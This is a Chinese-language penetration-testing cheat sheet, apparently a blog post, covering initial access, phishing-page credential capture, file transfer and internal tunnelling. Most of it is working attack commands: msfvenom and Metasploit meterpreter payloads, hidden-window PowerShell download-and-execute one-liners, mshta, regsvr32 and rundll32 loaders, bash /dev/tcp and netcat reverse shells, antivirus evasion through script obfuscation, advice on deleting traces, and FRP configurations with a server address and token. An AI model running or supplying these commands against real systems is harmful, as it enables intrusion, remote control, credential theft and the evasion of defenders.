目錄結構
- 獲取入口
- 郵件釣魚
- Word/Excel 宏文件
- 制作釣魚站點
- SPF 郵件偽造
- DMARC
- DKIM
- 學習資料
- Wi-Fi
- 網線
- Bad USB
- Exchange
- Office 365
- 開源應用
- Web 集成環境
- Web
- Password spraying
- 近源滲透
- 社會工程學
- Phishing
- 文件傳輸
- Windows 主機
- Linux 主機
- 編程語言
- Reverse Shell
- Windows
- Linux
- 建立隧道
- venom
- Proxifier
- FRP
- proxychanis
- nps
- SSH
- 參考資料
獲取入口
Web
能夠拿權限的漏洞:
- SQL Injection
- RCE
- 反序列化
- 代碼執行
- 命令執行
- 文件上傳
- 弱口令
以及打現有 NDay。
開源應用
每個小節里面內容可以寫出一系列文章,將其貼入即可。如 Struts2
Struts2:
- [CVEXXXX-XXXX 分析]()
- ......
Struts2
ThinkPHP
Shiro
fastjson
ElasticSearch
Dedecms
PHPCMS
ECshop
Metinfo
Discuz
帝國CMS
phpMyAdmin
WordPress
Joomla
Drupal
ActiveMQ
Solr
RabbitMQ
ZooKeeper
Typecho
SiteServer
禪道
通達 OA
WebServer
WebLogic
Jboss
WildFly(前身叫 Jboss)
Tomcat
IBM WebSphere
Axis2
GlassFish
IIS
Jekins
Web 集成環境
一般偷懶或者不會搭建環境的人使用,沒有權限意識則的會用管理員運行權限啟動,如 Administrator 或 Root。
寶塔
PHPStudy
AppServ
Xampp
Password spraying
密碼噴灑和暴力破解區別是什么呢?前者是一個密碼對多個賬戶進行登錄,后者是一個賬戶盡可能使用多個密碼嘗試登錄。
Exchange
https://github.com/dafthack/MailSniper
導入。
ipmo .\MailSniper.ps1
獲取 netbios 名。
Invoke-DomainHarvestOWA-ExchHostname <host>
驗證郵箱名。
Invoke-DomainHarvestOWA-ExchHostname -UserList .\userName.txt -OutFile sprayed-ews-creds.txt
驗證子域郵箱名
Invoke-DomainHarvestOWA-ExchHostname -Domain <domain> -UserList .\userName.txt -OutFile sprayed-ews-creds.txt
Office 365
近源滲透
物理滲透、物理攻擊、近源滲透,這幾個的意思都是在接近目標進行安全測試。
Wi-Fi
網線
沒有終端準入控制,直接插網線 DHCP 獲取 IP。
Bad USB
Black Hat 上提出 Bad USB。
社會工程學
在信息收集過程中就開始。
釣魚本質是利用人的信任。
信息收集開始就發釣魚,有個時間差,人家不一定點呢
學習資料
https://attack.mitre.org/techniques/T1566/
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki#phishing-setup
郵件釣魚
郵件 SPF 郵件偽造 DMARC DKIM
Word/Excel 宏文件
Spearphishing Attachment
制作釣魚站點
- 選擇一個相似域名,比如 www.baidu.com,變為 www.baidU.com
- 制作 Web 頁面
vpn
oa
Nginx 反向代理嗅探明文賬戶。
模擬出一個真實釣魚頁面,迷惑受害者輸入賬戶,通過 JS 正則驗證輸入賬戶是否正確,所有信息格式正確后通過 Javascript Fetch or XMLHttpRequest API 發送數據到服務器,服務器通過參數來獲取數據并存入本地數據庫或文件。
文件傳輸
建立隧道或者內網橫向時肯定要往服務器傳文件,用 WebShell 就很方便。如果這臺機器本身沒有 WebShell,可以用系統自帶程序下載文件,如 wget。
本小節使用如 certutil 證書工具,它原本意圖不是用來下載文件的,但是可以這么干,有一個項目叫 LOLBAS 介紹了 Windows 下所有可以用來幫助滲透的程序,Linux 有 GTFOBins。
Windows 主機
FTP
服務端開啟 FTP 服務。
pip install pyftpdlib python3 -m pyftpdlib
還有部分選項可以指定:
- -i,指定 IP 地址(默認本機地址)
- -p,指定端口(默認 2121)
- -w,寫權限(默認為只讀)
- -d,指定目錄 (默認為當前目錄)
- -u,指定用戶名登錄
- -P,設置登錄密碼
客戶端連接。
1.運行 copy con <FileName> 把 FTP 配置寫入到 <FileName>,復制的文件 con 是鍵盤輸入。
open <Host> <Port> anonymous anonymous get <Tool> bye
open 是連接到 FTP 服務器,后面 anonymous 是賬戶,get 是下載文件,quit 斷開連接。
真實利用中不會有交互式 Shell 使用,FTP 使用 -s 選項執行 <FileName> 中 FTP 命令解決。
ftp -s:<FileName>
bitsadmin
Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin
bitsadmin /transfer <JobName> http://<Host>/<Filename> <SaveFileName>
certutil
證書管理工具下載文件到當前目錄。
certutil -urlcache -split -f http://<Host>/<Filename>
使用 certutil 下載的文件會原封不動在 %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 目錄下保存一份,文件名位隨機字符,使用 delete 可以刪除剛下載的緩存。
certutil -urlcache -split -f http://<Host>/<Filename> delete
PowerShell
powershell (new-object system.net.webclient).downloadfile('http://<HOST>/<Filename>', '<Filename>')
powershell -c "$p=new-object system.net.webclient;$p.DownloadFile('http://<HOST>/<Filename>', '<Filename>')"
// invoke-WebRequest 可以簡寫成 iwr、wget、curl
powershell invoke-WebRequest -uri 'http://<HOST>/<Filename>' -OutFile '<Filename>'
scp
// 拷貝單個文件到當前目錄 scp <UserName>@<Host>:<AbsoluteFilePath> ./ // 拷貝目錄到當前目錄 scp -r <UserName>@<Host>:<AbsoluteFilePath> ./
OPSEC:連接遠程服務器在 %USERPROFILE%.ssh\known_hosts 會留下主機 IP 和公鑰信息。
File Sharing
net use 使用管理員賬戶才能建立 IPC 連接。
// 用戶名為 administrator 密碼為 123123 的賬戶登錄到 <Host>,將其共享盤符 C 盤映射到本地 K 盤。 net use K: \\<Host>\C$ "123123" /user:administrator
刪除連接。
net use \\<Host> /del
VBScript
直接在目標機器上輸出重定向腳本。
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
運行下載。
cscript wget.vbs http://<HOST>/<Filename> <Filename> wscript wget.vbs http://<HOST>/<Filename> <Filename> ./wget.vbs http://<HOST>/<Filename> <Filename>
缺點是不支持 https。
至于 cscript 和 wscript 區別,個人在 Windows 11 Terminal 上執行沒觀察到不同,也不彈框,殺軟不攔。
下完后記得刪除腳本 wget.vbs,避免留痕。
Linux 主機
wget
// 下載文件到當前目錄 wget http://<Host>/<FileName> // -O 可以保存到指定目錄 wget http://<Host>/<FileName> -O <FileName>
curl
// 下載文件到當前目錄 curl http://<Host>/<FileName> -O // -O 保存到指定目錄 curl http://<Host>/<FileName> -o <FileName>
如果下載連接證書有問題,可以用 -k 跳過。
curl http://<Host>/<FileName> -O -k
nc
參見 Netcat - raingray Blog 一文。
Server 監聽 333 端口接收 333 端口傳過來的文件,輸出重定向為 23.txt
nc -lp 333 > 23.txt
Client 連接到 1.1.1.1 333 端口 并把 1.txt 文件傳過去,成功延遲 1 秒關閉連接。
nc -nv 1.1.1.1 333 < 1.txt –q 1
下面是另一種用法。
Server 監聽本機 333 端口,將333端口作為 a.mp4 文件的輸入來源,也就是 a.mp4 將輸入重定向到 333 端口。
nc -lp 333 < a.mp4
Client 連接到 1.1.1.1 333 端口后將 333 端口的內容輸出重定向到當前文件夾下的 2.mp4 文件中,如果沒有這個文件它會自動創建。
nc -nv 1.1.1.1 333 > 2.mp4
sftp
// 默認使用 SSH 連接到 22 端口。 sftp root@81.70.14.219 // 用 -P 指定 SSH 端口 sftp -P <Port> root@81.70.14.219
OPSEC:連接遠程服務器在 %USERPROFILE%.ssh\known_hosts 會留下主機 IP 和公鑰信息。
非交互式下載(待驗證)。
使用 <Username>、<Password> 連接到 <Host> 下載 <FileName>。
echo "sftp -n <Host> <<BLAH" >> file.sh echo "quote USER <UserName>" >> file.sh echo "quote PASS <Password>" >> file.sh echo "bin" >> file.sh echo "get <FileName>" >> file.sh echo "quit" >> file.sh echo "BLAH" >> file.sh echo "exit 0" >> file.sh chmod +x file.sh && ./file.sh
git
語法也很簡單直接,第一個參數是要克隆的倉庫,第二個參數是倉庫保存到當前目錄的名稱。
git clone <repository> [<directory>]
克隆支持常見 3 中 URL。
git clone ssh://[user@]host.xz[:port]/path/to/repo.git/ git clone git://host.xz[:port]/path/to/repo.git/ git clone http[s]://host.xz[:port]/path/to/repo.git/
編程語言
系統自帶語言環境。
PHP
// 直接執行 Code,將 http://<Host>/FileName 寫入到本地 FileName。
php -r 'file_put_contents("FileName", file_get_contents("http://<Host>/FileName"));'
Python
// Python2// 將 http://<Host>/FileName 寫入 Path 中python2 -c "import urllib2;u=urllib2.urlopen('http://<Host>/FileName');f=open('Path', 'w');f.write(u.read());f.close()"http:// Python3// 將 http://<Host>/FileName 寫入 Path 中,這里要注意 decode() 中編碼要與目標文件編碼一致。python3 -c "import urllib.request;u=urllib.request.urlopen('http://<Host>/Filename');f=open('Path', 'wb');f.write(u.read())"http:// Python3 寫文本文件。// 注意事項:decode() 編碼一定要和目標文本編碼一致不然會亂碼。python3 -c "import urllib.request;u=urllib.request.urlopen('http://<Host>/FileName');f=open('Path', 'w');f.write(u.read().decode('UTF-8'))"
Ruby
// 將 <Host>/FileName 下載保存為 Path。只支持 HTTP,如果目標自動重定向到 HTTPS 則會出錯。
ruby -e "require 'net/http';Net::HTTP.start('<Host>') { |http| r = http.get('/FileName');open('Path.png', 'wb') { |file| file.write(r.body)}}"
Perl
perl -MLWP::Simple -e 'getstore("http://<Host>/FileName", "Path")'
Reverse Shell
https://highon.coffee/blog/reverse-shell-cheat-sheet/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
反彈 Shell 分正向和反向,正向是目標機器開放入口等待主動連接,我們連接成功后拿到 Shell,如 Web Shell。一旦涉及到彈系統 Shell 則較麻煩,目標防火墻入站不接受日常服務——SSH、HTTP、HTTPS 以外規則訪問,導致無法連接成功。
Client -> Firewalld -> Server
反向則是目標機器將自己 Shell 交出來主動連接我們服務器。只要目標機器能夠外連互聯網機器即可,這種情況避免了入站流量被阻斷的情況,一般來說出站流量不會收到限制。
Server -> Firewalld -> Client
Windows
Netcat(待測試)
正向連接
服務端監聽。將 cmd 重定向到 6666 端口。
nc -lvp 6666 -e cmd.exe
客戶端連接。
nc 1.1.1.1 6666
反向連接。
服務端主動連接客戶端。主動將 cmd.exe 傳遞到 1.1.1.1 7777 端口
nc -e cmd.exe 1.1.1.1 7777
客戶端等待連接
nc -lvp 7777
mshta
msf 開啟 hta 服務。
use exploit/windows/misc/hta_server set srvhost <Host> set payload windows/x64/meterpreter/reverse_tcp set target 1 // 設置目標系統類型為 x64,0 是 x86 exploit -j
Payload 和 target 設置類型設置為 X64 還是 X86,實際情況要根據系統版本來看。
執行反彈。
mshta http://<Host>:8080/say00S5.hta
msfvenom 生成 HTA 文件。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhos=<Host> loport=<Port> -f htfa-psh -o attack.hta
msf 監聽即可。
handler -p windows/x64/meterpreter/reverse_tcp -H <Host> -P <Port>
這里 handler 相當于一鍵設置 exploit/multi/handler 和 Payload。
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <Host> set lport <Port> exploit -j
Cobalt Strike 也可以生成 hta 文件,在菜單 Attacks -> HTML Application 生成。
Rundll32
Rundll32 用于運行 32 位 DLL 文件,說白了就是能執行 dll 中代碼。
可以執行 .hta 上線。
rundll32.exe url.dll,OpenURL attack.hta
或者是通過 MSF SMB Delivery 上線。
設置共享 dll 服務監聽 IP 和端口,默認監聽 0.0.0.0:445
use exploit/windows/smb/smb_delivery
啟動完成將給出 .dll 文件地址。
rundll32.exe \\Host\test.dll,0
默認共享不方便使用,可以找到 MSF 生成的 .dll 復制下來用 http 服務托管加載。
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=<Host> LPORT=<Port> -f dll > attack.dll
msf 使用指定 Payload 監聽。
handler -p windows/x64/meterpreter/reverse_tcp -H <Host> -P <Port>
客戶端加載上線。
rundll32 shell32.dll,Control_RunDLL attack.dll
Regsvr32
Regsvr32 用于注冊 .dll 文件為組件。
存放在 %systemroot%\System32\regsvr32.exe。
use exploit/multi/script/web_delivery set srvhost <Host> set target 3 set payload windows/x64/meterpreter/reverse_tcp set lhost <Host> exploit -j
客戶端執行上線。
regsvr32 /s /n /u /i:http://<Host>/xxx.sct scrobj.dll
Certutil
生成 exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Host> LPORT=<Port> -f exe > attack.exe
下載文件到 C:\Windows\Temp\ 并執行,最后刪除緩存。
certutil -urlcache -split -f http://<Host>/attack.exe C:\Windows\Temp\attack.exe & start C:\attack.exe // 刪除緩存 certutil -urlcache -split -f http://<Host>/attack.exe
Powershell
1.生成 PowerShell 腳本上線。
生成 ps1 腳本指定反連接地址和端口。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Host> lport=<Port> -f psf-reflection -o attack.ps1
MSF 監聽。
handler -p windows/x64/meterpreter/reverse_tcp -H <Host> -P <Port>
執行上線。
powershell -w hidden -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<Host>/attack.ps1');attack.ps1"
2.powercat 上線。
此工具實現了 Netcat 功能。
-c 反連服務器地址,-p 反連服務器端口,-e 反彈 cmd。
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<Host>/powercat.ps1');powercat -c <Host> -p <Port> -e cmd"
服務端只需等待 Shell 反彈回來即可。
nc -lvp <Port>
3.msf web_delivery 上線。
target 2 PSH 是 PowerShell 簡寫,用于生成 PowerShell 腳本。
use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp exploit -j
執行 msf 提供的腳本即可。
4.PowerShell 運行 cscript 程序去執行 vbs 腳本上線
生成 vbs 腳本。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Host> lport=<Port> -f vbs -o attack.vbs
MSF 監聽。
msf6> handler -p windows/x64/meterpreter/reverse_tcp -H <Host> -P <Port>
下載腳本到 $env:temp,sccript 執行 attack.vbs 上線。
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<Host>/attack.vbs',\"$env:temp\attack.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\attack.vbs\""
5.PowerShell 運行 bat
msfvenom -p cmd/windows/powershell_reverse_tcp lhost=<Host> lport=<Port> -o attack.bat
MSF 監聽。
handler -p cmd/windows/powershell_reverse_tcp -H <Host> -P <Port>
上線。
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<Host>/attack.bat'))"
6.補充
PowerShell 混淆
Invoke-Obfuscation
導入腳本
powershell -ep bypass import-Module ./Invoke-Obfuscation.psd1;Invoke-Obfuscation
設置需要混淆的腳本路徑。
set scriptpath C:\attack.ps1
設置混淆模式。
token\all\1
輸出混淆后腳本。
out mix-attack.ps1
嘗試執行混淆后腳本看 AV 是否攔截。
powershell -ep bypass -f mix-attack.ps1
msiexec
msiexec 用于安裝 Windows MSI 程序,常常通過命令行用來批量安裝應用。
生成 Payload。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Host> lport=<Port> -f msi -o attack.msi
MSF 監聽。
handler -p windows/x64/meterpreter/reverse_tcp -H <Host> -P <Port>
上線。
msiexec /q /i http:<Host>/attack.msi
OPSEC:運行后不知道需確認 %TEMP% 是否存在日志(這條待確認)https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84msiexec#:~:text=%E6%89%A7%E8%A1%8C%E5%90%8E%E4%BC%9A%E5%9C%A8%25TEMP%25%E4%B8%8B%E7%94%9F%E6%88%90MSI%E7%9A%84log%E6%96%87%E4%BB%B6%EF%BC%8C%E5%A6%82%E5%9B%BE
exe 可執行文件
生成 Payload。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Host> lport=<Port> -f exe -o attack.exe
MSF 監聽。
handler -p windows/x64/meterpreter/reverse_tcp -H <Host> -P <Port>
上線。
powershell (New-Object Net.WebClient).DownloadString('http://<Host>/attack.bat', 'attack.exe');start attack.exe
powershell -w hidden -ep bypass -nop (New-Object Net.WebClient).DownloadString('http://<Host>/attack.exe', 'attack.exe');start-process attack.exe
Linux
Bash
控制端將輸入傳輸到被控端執行,被控端也要將執行返回的內容輸出到控制端完成交互。
// 返回部分交互式 Shell,沒有 [Username@HostName CurrentDir] bash -i > /dev/tcp/<IP>/<Port> 0>&1 2>&1 // 能夠返回完整可交互 Shell bash -i &> /dev/tcp/<IP>/<Port> 0>&1
bash -i
/dev/tcp
0>&1
2>&1,2 是錯誤輸出,>& 是錯誤輸出重定向,1 是標準輸出,連起來是將錯誤內容輸出重定向到標準輸出里。
Netcat
Server 監聽 將 /bin/sh 傳輸到
nc -lvp <Port> -e /bin/sh
Client 連接到目標端口即可拿到 Shell
nc <IP> <Port>
nc 沒有 -e 參數如何反彈。
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <IP> <Port> > /tmp/f
詳見 Netcat - raingray Blog 一文
Server 監聽 333 端口,用 -c 把 shell 傳過去,-c 是使用 shell。nc -lp 333 -c bash
Client nc 連接到 Server 333 端口,由于服務端把 shell 傳過來了,客戶端就擁有執行命令的權限,權限多大的具體看用戶。
nc 172.28.112.34 333
另外還有種用法是客戶端監聽 333 端口(測試者開放端口等待服務端連接)。
nc -lp 333
服務端連連接 333 端口把自己的 shell 傳給客戶端。得到目標系統 shell 后可以利用這種方法把目標系統 shell 傳給測試者(讓服務器主動連接測試者)。
B(server):nc 172.28.112.34 333 -c bash
注:如果是 Windows 請把 shell 換成 cmd。
Python
通過 Python 獲取 pty 終端,不太好用但相比 Bash 反彈的 Shell 來說好多了。
python -c "import pty;pty.spawn('/bin/bash')"
關于獲取一個標準終端的兩篇文章
https://www.freebuf.com/news/142195.html
https://bbs.ichunqiu.com/thread-54982-1-1.html
https://legoc.github.io/2018/09/20/Linux提權思路
PHP
Ruby
Perl
OpenSSL
Telnet
git hooks
在項目設置 git hook 的 pre-receive 寫上反彈語句,pre-receive 就是在 commit 之前會執行腳本。之后就新建個文件 commit 就可以拿到 Shell了。
建立隧道
create tunnel
開啟隧道:ABPTTS,就是加了 SSL
reGeog+proxifie,NPS,socktcap,ew
傳輸隧道按層劃分:應用層啊,傳輸層啊。
HTTP,TCP,DNS,SSH,SOCKS,SOCKS5,ICMP
掛代理不要 icmp,很多工具不支持
流量轉發與隧道選擇
人稱狗洞,用來流量轉發 https://github.com/vzex/dog-tunnel
文章:
[1] 內網端口轉發及穿透
https://hatboy.github.io/2018/08/28/%E5%86%85%E7%BD%91%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E5%8F%8A%E7%A9%BF%E9%80%8F/#%EF%BC%883%EF%BC%89Dog-Tunnel
[2] (Almost) All The Ways to File Transfer
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
[3] 一句話開啟HTTP服務
frp 內網穿透,配合 vps 使用,效果還不錯。在反彈 Shell 時一直有個問題,在沒有公網 vps 中轉流量如何反彈 Shell 到本機?
拿到管理員權限后可以用 Proxifer 來代理本機軟件,通過 frp 開 socket 連接到目標內網。
venom
https://github.com/Dliv3/Venom
Proxifier
FRP
目標通網,可以使用 FRP 連到內網,不用處理,直接免殺。
frps.ini
[common] bind_addr = 0.0.0.0 bind_port = 7000 kcp_bind_port = 7000 token = 18xujk38 tcp_mux = true log_file = ./frps.log log_level = info log_max_days = 3
frpc.ini
[common] server_addr = 106.2.120.110 server_port = 7000 protocol = kcp token = 18xujk38 [plugin_socks5] type = tcp local_port = 8084 remote_port = 29017 plugin = socks5 use_encryption = true use_compression = true
系統安全運維
一顆小胡椒
LemonSec
LemonSec
一顆小胡椒
黑客技術與網絡安全
CNCERT國家工程研究中心
HACK之道
雁行安全團隊
一顆小胡椒
一顆小胡椒
LemonSec
